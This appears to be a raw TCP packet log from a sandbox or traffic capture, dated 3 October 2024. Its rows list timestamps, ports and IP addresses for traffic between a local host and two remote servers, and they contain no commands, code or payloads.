                                                                                                                                                      Oct 3, 2024 09:16:40.199693918 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.199698925 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.199703932 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.199794054 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.199809074 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.199966908 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.200596094 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.200695038 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.200711012 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.200726986 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.200753927 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.200779915 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:40.200782061 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.200795889 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.200884104 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:40.201015949 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355319977 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355421066 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.355467081 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355508089 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355892897 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.355911016 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.360500097 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360548019 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:41.360622883 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360905886 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:41.360915899 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.018505096 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.018641949 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.019207001 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.019215107 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.021101952 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.021120071 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785641909 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785737038 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.785825014 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.785841942 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.786021948 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:42.786039114 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.789231062 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.794264078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:42.794380903 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.795058012 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:42.799916029 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416296959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416335106 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416346073 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416364908 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416404009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416595936 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416608095 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416619062 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.416632891 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.416660070 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.417084932 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417097092 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417108059 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417119980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.417124033 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.417160034 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.421232939 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.421292067 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.421317101 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.421358109 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506170988 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506227016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506238937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506429911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506429911 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506454945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506490946 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506639004 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506652117 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506675959 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506692886 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.506973028 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.506985903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507025003 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507287025 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507330894 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507469893 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507483959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507514000 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507530928 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507751942 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507791996 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.507947922 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507957935 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.507992029 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508548021 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508558989 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508593082 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508631945 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508667946 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.508788109 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508799076 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.508831024 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.509104013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.509115934 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.509149075 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.596683025 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596723080 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596862078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596873999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.596884012 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.596935987 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597203016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597214937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597225904 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597254038 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597271919 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597661018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597671986 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597682953 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.597707987 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.597735882 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.598159075 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598170996 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598181963 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598192930 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.598216057 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.598246098 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599036932 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599056959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599067926 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599077940 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599090099 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599117994 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599153996 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599654913 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599668980 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599711895 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599746943 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599860907 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599874020 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.599903107 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.599921942 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.600212097 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600224018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600234032 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600244999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600256920 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.600261927 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.600291967 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.600339890 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.601150036 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601162910 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601175070 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601185083 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601197004 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601207018 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.601226091 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.601257086 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.686664104 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686683893 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686702013 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686714888 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686724901 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686738014 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.686831951 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.686883926 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.687235117 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.687247038 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.687258005 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.687269926 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.687282085 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.687280893 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.687299967 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.687325954 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.687997103 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688052893 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.688177109 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688189983 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688231945 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.688385010 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688395977 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688435078 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688435078 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.688446999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.688488007 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.689141035 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689153910 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689165115 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689174891 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689187050 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689193964 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.689197063 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.689215899 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.689232111 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690043926 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690057993 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690068960 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690079927 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690097094 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690109015 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690138102 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690669060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690681934 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690692902 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690702915 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690715075 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.690720081 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690743923 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.690762997 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.691665888 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691679955 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691690922 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691701889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691711903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691720009 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.691725016 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.691751003 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.691767931 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.692552090 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.692565918 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.692576885 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.692588091 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.692599058 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.692605972 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.692630053 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.692648888 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.693495035 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693506956 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693517923 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693528891 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693540096 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693548918 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.693551064 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693562031 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.693571091 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.693589926 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.693605900 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.694374084 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694389105 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694399118 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694410086 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694421053 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694430113 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.694432974 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694443941 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.694452047 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.694472075 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.694485903 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.695188999 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.695241928 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.776638985 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.776678085 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.776690006 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.776747942 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.776796103 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.776941061 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.776954889 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.776998043 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.777198076 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777210951 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777252913 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.777797937 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777812004 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777822971 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777834892 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777847052 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.777858019 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.777889967 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.778027058 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778083086 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.778222084 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778234959 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778249979 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778259993 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.778260946 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778273106 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778274059 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.778285027 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.778295994 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.778321981 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.779141903 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779159069 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779170036 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779182911 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779194117 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779206038 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779206038 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.779236078 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.779256105 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.779807091 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779820919 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.779869080 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.779886007 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.780050993 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.780065060 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.780105114 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.780119896 CEST4974580192.168.2.6147.45.44.104
                                                                                                                                                      Oct 3, 2024 09:16:43.780126095 CEST8049745147.45.44.104192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:43.780138969 CEST8049745147.45.44.104192.168.2.6
